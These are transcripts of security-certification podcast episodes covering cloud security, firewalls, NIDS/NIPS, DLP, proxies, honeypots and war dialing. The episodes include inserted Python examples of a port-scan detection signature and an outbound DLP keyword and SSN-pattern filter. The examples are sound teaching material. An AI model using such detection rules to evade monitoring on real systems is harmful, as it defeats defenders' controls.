techniques discussed earlier in this course, that you have spam filtering installed, and that you have antivirus, not just for the server itself but also to scan and quarantine all of the attachments being sent or received by your users. Next, we have a web server. In the Windows environment this is usually hosted by Internet Information Services, or IIS. For Linux or macOS, this is usually going to be an Apache web server. Either way, web servers are by default open to the internet in order to do their job, so it's important for us to secure them properly. They should always be placed in your organization's DMZ, and they should be properly firewalled, monitored, logged, audited and patched to ensure their security. Always make sure that your web server is up to date with the latest patches. If you aren't sure what patches need to be applied, you can always visit the Common Vulnerabilities and Exposures (CVE) website, which is maintained by the MITRE Corporation. This site keeps an up-to-date list of publicly disclosed vulnerabilities across the software on the market, each with an identifier you can search for against the versions you are running. Our fourth type of server is an FTP server. An FTP server is a specialized type of file server that's used to host files for distribution across the web. These servers can be set up to allow anonymous login and retrieval of files, or they can be secured with a username, password or other credentials. You might want an anonymous FTP setup if you're distributing your software, for example, or you may want a secured FTP server so that your remote offices can upload and download large files over the internet to your network. If you're setting up an FTP server, remember to always force an encrypted connection using Transport Layer Security (TLS), which is what FTPS is, or use SFTP, which runs over SSH instead. Because if you're going to require a username and password, you want to make sure they're protected during transmission. By default, plain FTP runs over ports 20 and 21 and passes everything, including your credentials, across the network unencrypted.



Aug 28, 2021 10:25
Issues with Cloud and how to secure them.....


Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 66 today we're going to discuss about cloud security. Once we begin to rely on virtualization and cloud computing for our deployments, it becomes very important to recognize that our data might be hosted on the same physical server as another organization's data. By doing so, we introduce some vulnerabilities into the security of our systems. First, if the physical server crashes due to something one organization does, it can affect all of the organizations hosted on that same physical server. Similarly, if one organization has not maintained the security of their virtual environments being hosted on that server, there is a possibility that an attacker could utilize that to the detriment of all organizations hosted on that same server. Just as there are concerns when you interconnect your networks with somebody else's, there are concerns with hosting multiple organizations' data on the same physical server that's being run by a given cloud provider. It's important for us to properly configure, manage, and audit user access to the virtual servers being hosted. Also, you should ensure that your cloud-based servers have the latest patches, anti-virus, anti-malware, and access control in place, if you're going to be using Infrastructure as a Service as your model. To minimize the risk of having a single physical server's resources being overwhelmed, it's a good idea to set up your virtual servers in the cloud with proper failover, redundancy, and elasticity. By monitoring the network's performance and the physical server's resources, you should be able to balance the load across several physical machines instead of relying on a single one. After all, elasticity is one of the main benefits of migrating to the cloud in the first place. Most of cloud security relies on the same security practices that you would perform for other servers, such as ensuring complex passwords are used, strong authentication mechanisms are in place, and strong encryption is being used to protect your data at rest, in transit, or in process. Also, your cloud environment should have strong policies in place to ensure that it's clear what things a user may and may not do with that cloud service. Finally, remember that the data that you're hosting in the cloud is on somebody else's physical server. If you're using a public cloud model, you need to be concerned about data remnants that could be left behind when a cloud server is deprovisioned after demand for the service is reduced. This could lead to a vulnerability where your data is available to other organizations using that same server. To prevent this, data should always be encrypted when placed on the cloud server, including the virtual hard disk files for those virtual servers that are being hosted.


Aug 27, 2021 04:13
As a Service that we get over Network from Cloud....


Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 65 today we're going to discuss about As a Service. Cloud computing also comes as four different types of services. I like to refer to these by the generalized term of "as a service" because, as you're going to see, everything in the cloud is something as a service. The four types you need to be aware of are Software as a Service, Infrastructure as a Service, Platform as a Service, and Security as a Service. With Software as a Service, you're going to be provided with a complete solution. This includes the hardware, the operating system, the software, the applications, everything that's needed for that service to be delivered. For example, if you use Office 365 from Microsoft, this is considered Software as a Service, and it allows your end users to access their email, their Word documents, their PowerPoint presentations, and all of that directly from within their web browser. Sometimes though, you're going to have to build a customized piece of software to meet your particular service needs. In this case you might only need the service provider to give you the hardware, the operating system, and the backend server software. With Infrastructure as a Service, you get the benefit of this dynamic allocation of additional resources known as elasticity, but you don't have to deal with the headache of long-term commitments and contracts, buying the hardware, and installing the underlying operating systems. For example, you might want to contract for a new cloud-based web host to host your company's website upon. The server might be built and hosted by the cloud service provider, and come with a pre-installed Linux operating system and an Apache web server. Now, your programmers can simply create a custom application for your customers that runs on top of this web server without having to worry about the underlying operating system and hardware. The third type of service is called Platform as a Service. Under this model, the third party vendor will provide your organization with all the hardware and software needed for a specific service to operate. For example, if your company is developing a new piece of software, they might have a development platform that's provided by a third party cloud provider. This might be an example of Platform as a Service. Now, if we want to summarize these three types, remember that with Infrastructure as a Service, you're provided with everything you need to run a server, including the power, the space, the cooling, the network, the firewalls, the physical servers, and the virtualization layer. With Platform as a Service, the operating system and the infrastructure software are added to that list I just gave you. Now infrastructure software includes things like an Apache web server, a MySQL database, programming languages and lots more. With Software as a Service, the hosted application software is added on top of this infrastructure and platform portions. As you can see, Software as a Service is much closer to your end user than either Platform as a Service or Infrastructure as a Service. Now, at the beginning of this lesson, I said that there were four types of as a service that you had to know for the exam. The fourth one is Security as a Service.

Aug 26, 2021 10:55
Cloud Types...


Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 64 today we're going to discuss about cloud types. Cloud computing isn't a single thing though, because there are many different ways to implement the cloud. You should know that there are four different cloud types: public, private, hybrid and community. The most common type of cloud architecture is the public cloud. Under this model, a service provider makes resources available to the end user over the internet. There are numerous public cloud solutions available today, including those from Google, Microsoft and Amazon. For example, Google Drive is a public cloud service that's offered both as a free and a pay-for-use model. Public clouds can often be an inexpensive way for an organization to gain the required capability and service they need quickly and efficiently. The second option is what's known as a private cloud. This service requires that a company create its own cloud environment that only it can utilize as an internal enterprise resource to manage its cloud. With a private cloud, your organization is responsible for the design, implementation and operation of the cloud resources, and the servers that host them. For example, the United States Government runs a private cloud for use by different organizations within the government. But my company and yours can't get access to it like we could with Google Drive. Generally, a private cloud is chosen when security is more important to the organization than cost. A hybrid cloud solution combines the benefits of both the public cloud and the private cloud options. Under this architecture, some resources are developed and operated by the organization itself, like a private cloud would be, but the organization can also utilize the publicly available resources or outsource services to another service provider, like a public cloud does! Because of this mixture of private and public cloud resources, strict rules should be applied for what type of data is hosted in each portion of this hybrid cloud. For example, any confidential information should always be hosted on the organization's private cloud portion. Our fourth option is known as a community cloud. Under this model, the resources and cost are shared among several different organizations who have a common service need. This is similar to taking several private clouds and connecting them together. Now, the security challenge here is that each organization may have their own security controls. Remember, if you connect your network to another network, you inherit their security risks as well. This doesn't change just because we've moved to the cloud environment. So, which of these four models, or combination of models, is right for your organization? Well, there's no clear-cut answer, because it really depends on your security needs, your cost restrictions and your risk tolerance. Generally, it's cheapest to use a public cloud model, but this also increases the risk to your information's confidentiality and availability. Well, there are many other things you need to consider as a security practitioner. There is going to be no single right answer here; instead, it's our job to weigh the benefits and the drawbacks of each of these models to decide which one is right for our organization's security needs and their concerns.



Aug 25, 2021 04:59
New Trend In IT Industry - Cloud Computing


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 63 today we're going to discuss about Cloud Computing. These days, cloud computing seems to be the big trend within our industry. But what exactly is cloud computing? Well, cloud computing is defined as a way of offering on-demand services that extend the traditional capabilities of a computer or a network out into the Internet. With the promise of increased availability, higher resiliency, and unlimited elasticity, the cloud definitely can provide our organizations a lot of advantages over our traditional network architectures. But cloud computing can also bring a number of unique security challenges into our environments, too. For cloud computing to gain its intended cost savings and efficiencies, though, it relies heavily on the concept of virtualization. By using virtualization, numerous logical servers can be placed on a single physical server. This, in turn, can help us reduce the amount of physical space, power, and cooling that's needed inside your data center. Additionally, by using virtualization, we can achieve higher levels of availability by spinning up additional virtual servers when necessary. This ability to dynamically provision memory and CPU resources is one of the key benefits of cloud computing. While there are a lot of benefits to cloud computing, such as decreased cost, increased scalability, and unlimited elasticity, there are also numerous security issues that we have to consider. Most of the same security issues that we have with physical servers also get carried over into the cloud computing environment, too. Often times, I hear executives think that all of their problems will be solved by moving to the cloud. This is simply not the case. To gain these efficiencies, cloud providers rely on virtualization to allow multiple logical servers to be placed on that single physical server, as we said before. Many cloud service providers, though, have taken virtualization a step further with the concept of hyper-converged infrastructure. This allows providers to fully integrate the storage, network, and servers without having to perform hardware changes. Instead, they rely on software and virtualization technology to perform all of the needed integrations. All of this can be managed from a single interface or device, without any worry about the underlying vendor solutions. Many cloud providers are also offering Virtual Desktop Infrastructure as one of their services. VDI allows a cloud provider to offer a full desktop operating system to an end user from a centralized server. There are a lot of security benefits to this approach. For example, one organization that I worked with creates a new virtual desktop image for each user every time they log on in the morning. This desktop is non-persistent. So even if it's exploited by an attacker, it is destroyed as soon as the user logs off at the end of the day, or at midnight each night. This effectively destroys the attacker's ability to remain persistent on the end user's desktop, and adds a lot of security for us. Now, when we look at these numerous logical servers being stored on a single physical server, we also have to consider that there has to be a way to keep the data confidential and separated from the other logical servers, too. To do this, we use Secure Enclaves and Secure Volumes. Secure Enclaves utilize two distinct areas that the data may be stored and accessed from, and each enclave can be accessed by the proper processor. This is a technique that's used by Microsoft Azure and many other cloud service providers. Secure Volumes, on the other hand, are a method of keeping data at rest secure from prying eyes.

Aug 24, 2021 06:43
UTM Device Every Solution for your security problem...


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 62 today we're going to discuss about Unified Threat Management. The unified threat management, or UTM, system is a newer concept that was introduced in the last five to 10 years. Basically, security professionals realized, as I'm sure you're realizing now too, that relying on a single firewall is not enough to protect our networks, and so a UTM was created. Now a unified threat management system is a combination of network security devices and technologies that are added to a network to better protect it. Simply put, a UTM is a single device that combines many other devices and technologies into it. For example, your UTM might include a firewall, a network intrusion detection system or a network intrusion prevention system, a content filter or a proxy, an antivirus or anti-malware gateway, a data loss prevention system, and maybe even a site-to-site VPN if you have the need. Now these devices are designed to make it easier for a security administrator to use them. And instead of relying on a command line interface, with all the text-based commands, they get a graphical user interface instead. It allows them to make policies, rules, and signatures, which makes it much easier and much quicker to use. Now UTMs provide a singular package with multiple protections. And they are essentially a defense-in-depth strategy within a single device or system. Because of this, often these devices will replace your firewall, and it's usually placed as the outermost device in your local area network to provide its perimeter defense and its protections. You may have also heard the term Next Gen Firewall, or Next Generation Firewall, also known as NGFW. If you've heard this term, it's because it's being used in the industry instead of using the term UTM or unified threat management. These are those all-in-one security devices, and that's all a Next Generation Firewall is. This is a marketing ploy because people weren't understanding the UTM concept, but they understood firewalls, and so calling it a Next Generation Firewall helped them increase sales.

Aug 04, 2021 05:55
NIDS VS NIPS Which is better device ?


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 61 today we're going to discuss about NIDS versus NIPS. Now, we've already spoken a little bit about intrusion detection and intrusion prevention systems earlier on in this course. In this lesson though, we're going to focus on the differences between a network-based IDS and a network-based IPS. A Network Intrusion Detection System, or a NIDS, is a type of IDS that attempts to detect malicious network activities, for example, port scans and denial of service attacks. Now, this is a device that's usually placed either before the firewall, so that it can be directly exposed to all of the traffic that's coming in, or right behind the firewall. Personally though, I like to have my NIDS placed behind the firewall, as this helps filter the amount of traffic that we'd have to see and review, since the firewall is already going to block a lot of it for us. Generally, your Network Intrusion Detection System will be placed into what's known as promiscuous mode. This allows it to see all of the traffic that crosses the network instead of just the traffic that's destined for its own MAC address. This is easily done through the configuration of the NIDS, and by placing your NIDS on a SPAN port of your network switch so that it can receive all of the traffic moving through that switch, and not just the traffic on its own switch port. A NIDS can only detect, monitor, and alert on traffic based on signature-based rules or heuristics, and it won't do anything to actually stop an attack from occurring. When you're dealing with a NIDS, all it's going to do is log it and let you know about it. A Network Intrusion Prevention System, or NIPS, on the other hand, is a type that's designed to inspect traffic and, based on its configuration or security policy, it can also remove, detain, or redirect that malicious traffic. That means a NIPS can not only detect it and log it like an IDS does, but it can also stop that ongoing attack by blocking the IP address that's causing issues or shutting down the connection. But, to be able to effectively take these actions, the NIPS has to be installed in line in your network. Again, I like to place my NIPS in line, just behind the firewall. This way it's just inside the network perimeter and it allows me to have a good vantage point for it. Remember, when you're using a NIPS to block an ongoing attack, you want to ensure that the NIPS is properly tuned. If you didn't tune it properly with the right signatures, you could have a lot of false positives, and since these would be terminated, it could cause an inadvertent denial of service for your network if it tries to prevent what it thinks is malicious traffic from flowing into the network. Now, because a NIPS is an in-line device, you also have to think about what's going to happen if that device fails. Should that device fail open, or should it fail shut? If you set the device to be configured to fail open, this means that the NIPS is going to simply let all of the traffic through it whenever it fails. This is less secure obviously, and so you have to think about if this is really what you want. Now, if you choose to fail shut on the other hand, the device is going to block all the traffic if it fails for some reason. This means that it's going to create a denial of service condition for your entire network, which is also pretty bad. For this reason, most organizations choose to fail open with their Network Intrusion Prevention Systems, and rely on other defensive layers to provide some layer of protection until the NIPS can be brought online again and fixed. Now, in addition to providing their NIDS and NIPS functions, these devices also can be used as a protocol analyzer.
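The NIDS-versus-NIPS behaviour described in this episode, as an added example that is not the podcast's own code: one port-scan signature runs over constructed sample packets in both modes, so you can see the NIDS only alert while the NIPS blocks the source, what a too-low threshold does to a legitimate client, and how fail-open and fail-closed differ when the inline device breaks.

```python
"""NIDS vs. NIPS on the same traffic: added example, not the podcast's code.

A single signature (a port scan: many distinct destination ports from one
source within a short window) drives both modes. The NIDS only records an
alert; the NIPS, being inline, also blocks the source. A threshold set too
low shows the false-positive denial of service the episode warns about,
and the fail-open / fail-closed flag shows what an inline device does when
it breaks. All packets and thresholds are constructed sample values.
"""
from collections import defaultdict

# Constructed packets: (timestamp_s, src_ip, dst_ip, dst_port).
# 10.0.0.7 is a normal client; 203.0.113.9 walks ten ports in one second.
TRAFFIC = [
    (0.0, "10.0.0.7", "10.0.0.50", 80),
    (0.5, "10.0.0.7", "10.0.0.50", 443),
    (1.0, "10.0.0.7", "10.0.0.50", 8080),
] + [
    (2.0 + i / 10, "203.0.113.9", "10.0.0.50", port)
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 139, 443, 445])
]


class PortScanSignature:
    """Fires when one source touches `threshold` distinct ports in `window_s`."""

    def __init__(self, threshold=5, window_s=5.0):
        self.threshold = threshold
        self.window_s = window_s
        self.history = defaultdict(list)  # src_ip -> [(ts, dst_port), ...]

    def matches(self, ts, src, dst_port):
        hist = self.history[src]
        hist.append((ts, dst_port))
        # Keep only packets inside the sliding window.
        hist[:] = [(t, p) for t, p in hist if ts - t <= self.window_s]
        return len({p for _, p in hist}) >= self.threshold


def run_sensor(packets, signature, mode, fail_open=True, faulty=False):
    """Pass packets through a sensor in "nids" or "nips" mode.

    Returns (delivered, alerts, blocked): packets that reached the protected
    network, alert records, and source IPs the NIPS blocked.
    """
    if mode not in ("nids", "nips"):
        raise ValueError("mode must be 'nids' or 'nips'")
    delivered, alerts, blocked = [], [], set()
    for pkt in packets:
        ts, src, _dst, dst_port = pkt
        if faulty:
            # A NIDS hangs off a SPAN port, so its failure never stops traffic.
            # An inline NIPS either passes everything (fail open) or nothing
            # (fail closed), which is the denial of service the episode describes.
            if mode == "nids" or fail_open:
                delivered.append(pkt)
            continue
        if mode == "nips" and src in blocked:
            continue  # already blocked: dropped without further inspection
        if signature.matches(ts, src, dst_port):
            alerts.append((ts, src, "port scan"))
            if mode == "nips":
                blocked.add(src)  # block the offending IP address
                continue          # and drop the packet that tripped the rule
        delivered.append(pkt)
    return delivered, alerts, blocked


if __name__ == "__main__":
    for mode in ("nids", "nips"):
        d, a, b = run_sensor(TRAFFIC, PortScanSignature(), mode)
        print(f"{mode}: delivered={len(d)} alerts={len(a)} blocked={sorted(b)}")
    # Badly tuned threshold: the normal client is cut off as well.
    d, a, b = run_sensor(TRAFFIC, PortScanSignature(threshold=2), "nips")
    print(f"nips threshold=2: delivered={len(d)} blocked={sorted(b)}")
```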

Aug 03, 2021 12:07
Data loss prevention (DLP) this is how we inspect the data that is going out of our network...


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 60 today we're going to discuss about Data Loss Prevention. Data loss prevention, or DLP, systems are designed to protect data by conducting content inspection of your data as it's being sent out of your organization's network. While data loss prevention is the most commonly used term, it's also referred to as ILP, for Information Leak Prevention, or EPS, Extrusion Prevention Systems. Usually these systems are installed as a network-based DLP or a cloud-based DLP. For example, my company happens to use a cloud-based DLP through Google's G Suite. Any time one of our employees tries to send information outside of our own domain through email, that email is flagged and they have to verify that they understand the data is being sent outside of security.com. We have our DLP set to low because we communicate with so many people outside of our organization on a daily basis. But if we wanted to, we could force a higher security level and make each email being sent be checked and verified by a third employee before it was sent out, to ensure that no confidential data was being leaked outside of our network. Now, there are also automated ways to do this, so you can flag particular emails based on keywords or a no-no list and prevent any files or emails from being transferred with those keywords inside of them. It all depends on how you want to configure your DLP. DLPs are used to ensure your data stays within your network, that it isn't leaked out to outsiders, and that the privacy of your confidential data remains private. That's the whole goal here. We want to make sure that data isn't being sent outside of your network over and over again with this massive data exfiltration going on. DLP systems can help you with that.
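The outbound e-mail policy this episode describes, as an added example that is not the podcast's or Google's code: external recipients are flagged for the sender at the "low" level or held for a second person at the "high" level, and a keyword ("no-no") list plus one content pattern blocks the message outright. The domain, keyword list and messages are constructed.

```python
"""Outbound e-mail DLP policy modelled on the episode's description.

Added example, not the podcast's or Google's code. It reproduces the
behaviour described: mail to anyone outside the organization's own domain
is flagged for the sender to acknowledge at the "low" level, held for a
second person to verify at the "high" level, and any outbound message whose
subject, body or attachment names hit the keyword ("no-no") list, or that
contains a simple SSN-shaped pattern, is blocked outright. The domain,
keyword list and messages are constructed sample values.
"""
import re
from dataclasses import dataclass, field

OWN_DOMAIN = "example.com"  # constructed stand-in for the organization's domain
NO_NO_LIST = ["confidential", "internal use only", "customer list"]
# Constructed content rule: a US SSN-shaped number, a common DLP pattern.
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


@dataclass
class Email:
    sender: str
    recipients: list
    subject: str
    body: str
    attachments: list = field(default_factory=list)  # file names only


def external_recipients(msg):
    """Recipients whose domain is not the organization's own."""
    return [r for r in msg.recipients
            if r.rsplit("@", 1)[-1].lower() != OWN_DOMAIN]


def content_hits(msg):
    """Keyword and pattern matches across subject, body and attachment names."""
    text = " ".join([msg.subject, msg.body] + msg.attachments).lower()
    # Word boundaries so "confidential" does not fire on "confidentially".
    hits = [kw for kw in NO_NO_LIST
            if re.search(r"\b" + re.escape(kw) + r"\b", text)]
    if SSN_PATTERN.search(text):
        hits.append("ssn-pattern")
    return hits


def evaluate(msg, level="low"):
    """Decide what happens to an outbound message.

    Returns (action, reasons) with action one of:
      "allow"   - stays inside the domain, nothing to do
      "confirm" - external recipients; sender must acknowledge (level "low")
      "review"  - external recipients; held for a second person (level "high")
      "block"   - external recipients and a content hit; never sent
    """
    if level not in ("low", "high"):
        raise ValueError("level must be 'low' or 'high'")
    external = external_recipients(msg)
    if not external:
        return "allow", []
    reasons = [f"external:{r}" for r in external]
    hits = content_hits(msg)
    if hits:
        return "block", reasons + [f"content:{h}" for h in hits]
    return ("review" if level == "high" else "confirm"), reasons


if __name__ == "__main__":
    m = Email("alice@example.com", ["bob@partner.example"], "Q3 numbers",
              "See attached.", ["Customer List - CONFIDENTIAL.xlsx"])
    print(evaluate(m))
```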



Aug 02, 2021 06:55
What are Honeypots and Honeynets ?


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 59 today we're going to discuss about honeypots and honeynets. Honeypots and honeynets are used to attract and trap potential attackers to counteract any attempts at unauthorized access to your organization's network. Now, a honeypot is generally a single computer, but it could also be a file, a group of files, or an area of unused IP address space that might be considered attractive to a would-be attacker. A honeynet, on the other hand, is one or more computers, servers, or an area of the network. And often, this is used when a single honeypot is not deemed to be sufficient for your purposes. Now, why would we use honeynets and honeypots in our network? Well, this is usually used as a form of research, to try to learn about attackers. For example, the Honeynet Project at honeynet.org is a well-known honeynet that's in use today. It's used to learn the tools, tactics, and motives involved in computer and network attacks. And then they share what they learned with all of the different organizations out there. Your organization likely isn't going to put up a honeypot on its own, unless you're part of a security operations center for a large company that's trying to develop better countermeasures. For example, security researchers at companies like Microsoft, Google, and Apple might run a honeypot or a honeynet to try to be better prepared in the defense of their systems, and better understand the bad guys' techniques and tactics. But for most of us, honeypots and honeynets are just something we have to memorize.



Jul 27, 2021 06:00
Proxy Servers types that we use in these internet world...


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 58 today we're going to discuss proxy servers. A proxy server is a device that acts as a middleman for your clients. For example, if you're at work and you wanted to connect to , your work computer's likely going to go from itself to a proxy server within your company's LAN. And then that proxy server makes the connection to Dion Training to get the information that you requested, and then it will hand it back to you. This middleman approach allows the company to log everything that's being requested and who made the requests, and to filter out things they don't want you to access. There are four types of proxies in use today: IP Proxy, Caching Proxy, Content Filter, and Web Security Gateways. An IP Proxy is used to secure a network by keeping machines behind it anonymous. When your work computer decides to connect to through the proxy in my example above, my server doesn't know which particular computer is actually connected to it from your company's network. All I see is the proxy server itself. This is because your proxy is using NAT to translate your request from your machine into a request from the proxy. If you had 20 different computers on there trying to access my web server, it would still just look like one machine to my server, not 20. The next type is called a Caching Proxy. Caching Proxies are used to attempt to serve client requests without actually connecting to the remote server each time. Let's say that you went to my website at diontraining.com, and then your coworker, five minutes later, tried to go to diontraining.com just like you did. Well, the proxy, if it's using a cache, is going to be able to keep a copy of my webpage from the first time it fulfilled your request. Then, when your coworker requested it, it would simply serve it from its cache instead of going and getting a new copy from my site. This will allow your company to save on bandwidth costs and increase the speed of delivery for your coworker, because it already has it locally, inside your network. The most common caching proxy is known as an HTTP Proxy, which attempts to cache the web pages that are visited by users, such as the example I just gave you. Caching proxies are not as effective as they used to be, though, because we all live in a Web 2.0 world with lots of customized content being served up to us. So, for example, if you went to Facebook.com and your coworker went to Facebook.com, both of your Facebook feeds look drastically different, don't they? This is because you each get different information based on your friends and your likes and your desires. So caching here isn't very helpful because of this Web 2.0 structure. Also, most caching proxies only keep a copy of the information they get for about 24 hours. And after 24 hours, they're going to go back out and request a new copy to ensure that they get the latest information. Now, to simplify the installation and configuration of a caching proxy in your web browser, there's a special type of file called a PAC, a Proxy Auto-Configuration file. This file contains the settings needed for a host to connect to the proxy server. Unfortunately though, these files are subject to modification, and could be used to redirect the user to an attacker-controlled proxy instead of your organization's. For this reason, it is better to disable the PAC files and manually configure your proxy settings on your host machines, or you can push these out using a Group Policy Object, or GPO, update. Now, the third type of proxy is called an Internet Content Filter. These are used in large organizations as a way to prevent users from getting to stuff that they don't want you to access at work.

Jul 26, 2021 09:34
Firewalls first step for your perimeter security...


Hello everyone my name is vijay kumar Devireddy and i am glad to have you back on my episode 58 today we're going to discuss firewalls. Firewalls are primarily used to section off and protect one network from another. Now when we talk about firewalls, there are three main types: software-based, hardware-based, and embedded firewalls. Software-based firewalls run as a piece of software on a host or a server. In fact, if you're running a Windows server, those have a built-in Windows Firewall that you can enable. Hardware firewalls, on the other hand, are a standalone device that's actually an appliance that's installed into your network. It looks like another switch or another router that goes into your network stack. The third type of firewall is known as an embedded firewall. Embedded firewalls work as a single function out of many on a single device. So if you have a small office/home office router or a unified threat management device, these are examples of an embedded firewall. It's one piece of the larger device that does many different functions. Firewalls can operate in many different ways. The first one is packet filtering. Packet filtering is going to inspect each packet as it passes through the firewall, and it'll accept it or reject it based on the rules that it's been given. This relies on the firewall's configuration and the access control list that's been installed. If I'm running a web server, for example, I would configure my firewall to allow traffic inbound on port 80 and port 443 but close all of the other ports, because port 80 gives web traffic, and port 443 gives secure web traffic, and so those are expected to be used. There are two types of packet filtering, stateless and stateful. With stateless packet filtering, it's simply going to accept or reject packets based on the IP address and the port number that was requested. So if I'm running a web server and you requested to come in on port 80, I would allow that, but if you requested to come in on port 53, I would deny it because it's not in my access control list. Now a stateful packet filter, on the other hand, is going to keep track of requests that leave through the firewall. So if I make a request from a host through the firewall, it will temporarily open up the port number that I made the request from, some random high port number like 50,000 or 56,000. By using stateful packet inspection, you can almost entirely eliminate IP spoofing as a threat, because the firewall is going to inspect the header of each packet being received. It's then going to compare that against what it was expecting based on the request that recently went out, and then it's going to make its accept or reject decisions based on this additional information. This is a much more in-depth inspection than a stateless one does. Now, NAT filtering is another type of filtering we can do. This is going to filter traffic according to the port, whether it's a TCP or UDP port. This filtering can be done by simply checking the endpoint connections, by matching the incoming traffic to the requesting IP, and by matching the incoming traffic to the requesting IP address and port. Now, the next one we have is an application-layer gateway, or ALG. This is going to apply security mechanisms to specific applications such as FTP or Telnet. Now, instead of blocking traffic based on the Telnet port of port 23, instead it's going to inspect each packet and determine which application it was meant for, and if it finds out that it was meant for Telnet, it would block it because that was unauthorized. This is a resource-intensive process, but it is a powerful layer of security that can be added into your network. These are also known as Layer 7 firewalls because they operate at the application layer. Now, once that connection is established, the packets can then be sent or received without any further inspection or checks, because all of that was done during the session establishment.
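The stateless-versus-stateful packet filtering contrast from this episode, as an added example that is not the podcast's own code: the web server ACL allows inbound 80 and 443 and denies 53, and the stateful filter remembers an outbound request so that only the genuine reply to the random high source port gets back in, which is what shuts out a spoofed reply. Addresses, ports and the entry lifetime are constructed.

```python
"""Stateless vs. stateful packet filtering, as the episode describes them.

Added example, not the podcast's code. The scenario is the one in the text:
a web server behind the firewall, an ACL that allows inbound 80 and 443 and
nothing else (so inbound 53 is denied), and a stateful filter that remembers
an outbound request and temporarily opens the random high source port for
the matching reply only, which is what defeats a spoofed reply. Addresses,
ports and the entry lifetime are constructed sample values.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "tcp"


# Constructed ACL: (protocol, destination port) pairs allowed inbound.
WEB_SERVER_ACL = frozenset({("tcp", 80), ("tcp", 443)})


def stateless_filter(pkt, acl=WEB_SERVER_ACL):
    """Accept or reject on protocol and destination port alone, no memory."""
    return (pkt.proto, pkt.dst_port) in acl


class StatefulFilter:
    """Tracks outbound requests so only their replies are let back in."""

    def __init__(self, acl=WEB_SERVER_ACL, entry_ttl_s=60.0):
        self.acl = acl
        self.entry_ttl_s = entry_ttl_s
        # (proto, inside_ip, inside_port, remote_ip, remote_port) -> expiry time
        self.state = {}

    def outbound(self, pkt, now):
        """Record a request leaving the network; opens pkt.src_port briefly."""
        key = (pkt.proto, pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        self.state[key] = now + self.entry_ttl_s

    def inbound(self, pkt, now):
        """Accept a reply to a remembered request, or a packet the ACL allows."""
        # Drop entries whose temporary opening has expired.
        self.state = {k: exp for k, exp in self.state.items() if exp > now}
        # A reply must come from the exact host and port the request went to;
        # a packet aimed at the open high port from anywhere else is rejected.
        key = (pkt.proto, pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port)
        if key in self.state:
            return True
        return (pkt.proto, pkt.dst_port) in self.acl


if __name__ == "__main__":
    fw = StatefulFilter()
    fw.outbound(Packet("10.0.0.5", 50000, "198.51.100.2", 53, "udp"), now=0.0)
    reply = Packet("198.51.100.2", 53, "10.0.0.5", 50000, "udp")
    spoof = Packet("203.0.113.9", 53, "10.0.0.5", 50000, "udp")
    print("stateless reply:", stateless_filter(reply))    # False: 50000 not in ACL
    print("stateful reply:", fw.inbound(reply, now=1.0))  # True: matches request
    print("stateful spoof:", fw.inbound(spoof, now=1.0))  # False: wrong source
```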

Jul 23, 2021 (20:13)
Perimeter Security A process of securing your devices for outer world

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 57. Today we're going to discuss perimeter security. Now, when we talk about perimeter security, we're focused on the outer layer of our defense-in-depth posture for our networks. This is the boundary where we segment our LAN from the WAN and from the internet at large. When we focus on the boundary, or perimeter defenses, we utilize many different devices. In this section, you're going to learn all about firewalls, proxy servers, honeypots and honeynets, data loss prevention systems, network intrusion detection systems and network intrusion prevention systems, and combination devices like a unified threat management system, or UTM. A lot of this is going to be review from your Network+ studies, so we're going to cover this section fairly quickly, pointing out the things you need to know for Security+. So let's get started with our exploration of perimeter security devices.
Jul 21, 2021 (02:23)
Telephony Devices that we used to communicate b/w two different computers in way back days...

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 56. Today we are discussing telephony devices. Telephony is a term that's used for a device that provides voice communication to your end users. Originally, telephony was used in networks to make connections with the outside world, such as through your modem. A modem was an old device that would modulate and demodulate digital information into an analog signal that could be transmitted over a standard dial-up phone connection. So if you used AOL as a dial-up connection way back in the day, you would plug your phone line into your computer, it would take your ones and zeros, convert them into sounds and transmit that over the phone line.

Now, modems were a great attack vector from the security perspective, and for Security+ you need to know the concept of war dialing. War dialing is simply when an attacker starts dialing random phone numbers to see if any modems answer on the other side. A lot of servers back in those days had dial-up modems so that remote technicians could dial into the server, gain access and make changes to provide support. Well, if I was an attacker and I started dialing numbers in sequence, 555-1234, nobody there, 555-1235, and just kept going, eventually I'd find some server that answers. And if it does, I now have a way into that network.

So how do we protect the modems and dial-up resources we may still have from something like war dialing? One of the main things to do is use a callback feature. If you still have modems, which most of us don't in our networks anymore, you want to configure them so that when somebody calls in, the modem hangs up and, if it recognizes that phone number based on caller ID, calls them back at the number on file and only then initiates the connection. This verifies that the caller is really dialing from a number that's authorized, not just claiming to be. You also always want to use some form of authentication, like a username and password, and preferably something stronger like two-factor or multi-factor authentication. The best practice, though, is to do what most of us have done and eliminate modems where possible, switching to remote access using things like an SSH connection over a VPN tunnel. Now, while it's great to try to eliminate all your modems, sometimes you still have old systems and you simply can't. If you have to maintain a dial-up modem for some reason, keep that dial-up number a secret, so that somebody has to work hard to find it and get into your system, and again use good authentication and protections like callback to help secure it, because these are prime targets for attackers.

Now, the next type of telephony equipment I want to talk about is a PBX system. PBX equipment is something you're going to find much more often in your networks than modems. PBX stands for Private Branch Exchange. Essentially, this is the telephone system that runs all of the internal phone lines for your company. If you're sitting in your office and you want to call your accountant inside the office, and you only dial the last four digits of his phone number to reach him, that internal call is being routed through your PBX, your private branch exchange.

Jul 13, 2021 (14:51)
Network Address Translation (NAT) this is how private IP address are changed to public IP address....

